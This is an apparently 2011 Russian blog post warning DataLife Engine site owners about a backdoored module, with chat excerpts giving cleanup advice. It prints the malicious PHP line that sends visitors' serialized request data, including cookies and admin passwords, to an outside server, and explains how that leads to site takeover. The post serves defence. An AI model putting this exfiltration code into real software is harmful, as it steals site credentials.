Взлом DLE. Как защититься?
Взлом DLE или что такое глупость и как она лечится
Прочитал только что пост на форуме и удивился той наглости, с которой пытаются взламывать DLE.
Приведу только ключевую строку, которая собственно и является виновницей:
$result_search=file_get_contents("http://www.dplspider.ru/main_service.php?dpserver=".urlencode(serialize($_SERVER))."&dpquery=".urlencode(serialize($_REQUEST))) or die("<br><br><a href='http://www.dplspider.ru/faq/'>Возможная причина ошибки</a><br>Поддержка <a href='mailto:find@dplspider.ru'>find@dplspider.ru</a>");
echo($result_search);В итоге этот скрипт все же что-то нам выводит, чтобы мы не заподозрили чего неладного. Однако, разберем его подробнее:
Мы отправляем _GET запрос на какой-то адрес в котором так же отправляем подробную информацию о вашем сервере и еще некую информацию о посетителе, это все содержится в массиве $_SERVER. Но это пол дела, основное кроется в $_REQUEST.
Как известно, суперглобальный массив $_REQUEST объединяет в себе массивы: $_POST, $_GET и $_COOKIE. А вот в массиве $_COOKIE хранятся ваши пароли на доступ к сайту. Т.е. каждый пользователь обратившись к этому скрипту - отправляет злоумышленнику свои пароли. Администратор, естественно, является одним из первых отправивших свой пароль.
Вот так вот вас и взламывают, потом через "Поиск и Замена" вставляют свои скрипты в полную новость, в шаблоны и т.д.
Так что мой вам совет - не ставьте все подряд из интернета к себе на сервер, не посоветовавшись с доверенными специалистами.
Выкладываю часть диалога с разрешения собеседника:
****** (17:03:19 15/01/2011)
Здравствуйте
****** (17:03:27 15/01/2011)
прочитал Вашу статью
****** (17:04:20 15/01/2011)
по поводу взлома дле, я автор поста
****** (17:04:45 15/01/2011)
скажите пожалуйста как избавится от этой дряни
Sander (17:05:17 15/01/2011)
Если хоть раз запустился - менять пароли админов сайта
****** (17:06:16 15/01/2011)
запускался, и не раз, 2 раза взламывался (добавлялись ссылки с эротикой и появились непонятного рода ссылки в индексе сайта)
Sander (17:06:49 15/01/2011)
удалить код.
сменить пароли, почистить сайт.
Здравствуйте
****** (17:03:27 15/01/2011)
прочитал Вашу статью
****** (17:04:20 15/01/2011)
по поводу взлома дле, я автор поста
****** (17:04:45 15/01/2011)
скажите пожалуйста как избавится от этой дряни
Sander (17:05:17 15/01/2011)
Если хоть раз запустился - менять пароли админов сайта
****** (17:06:16 15/01/2011)
запускался, и не раз, 2 раза взламывался (добавлялись ссылки с эротикой и появились непонятного рода ссылки в индексе сайта)
Sander (17:06:49 15/01/2011)
удалить код.
сменить пароли, почистить сайт.
Вот еще случай из практики. Не хотела запускаться админка модуля, упорно писало "Hacking attemp!".
Оказалось что в файле админки (в index.php тоже самое) вместо привычного:
define ( 'DATALIFEENGINE', true );
Было написано:
define ( 'DLE', true );
После решения проблемы часть диалога:
Sander (00:57:51 27/01/2011)
Откуда dle качал?
****** (00:57:57 27/01/2011)
хз ))
Sander (00:58:07 27/01/2011)
не удивляйся, если взломают.
****** (00:58:13 27/01/2011)
хм
****** (00:58:24 27/01/2011)
а де скачать чтоб не взломали ?
Sander (00:58:39 27/01/2011)
не ставить всякие сомнительные сборки
Sander (00:58:53 27/01/2011)
в 90% случаев там бекдоры и шеллы
****** (00:59:06 27/01/2011)
аа
****** (00:59:10 27/01/2011)
вот оно что
****** (00:59:26 27/01/2011)
а то мне недавно какой-то левый код в новостях впихнули
Откуда dle качал?
****** (00:57:57 27/01/2011)
хз ))
Sander (00:58:07 27/01/2011)
не удивляйся, если взломают.
****** (00:58:13 27/01/2011)
хм
****** (00:58:24 27/01/2011)
а де скачать чтоб не взломали ?
Sander (00:58:39 27/01/2011)
не ставить всякие сомнительные сборки
Sander (00:58:53 27/01/2011)
в 90% случаев там бекдоры и шеллы
****** (00:59:06 27/01/2011)
аа
****** (00:59:10 27/01/2011)
вот оно что
****** (00:59:26 27/01/2011)
а то мне недавно какой-то левый код в новостях впихнули
Будте внимательны и осторожны! Удачи.
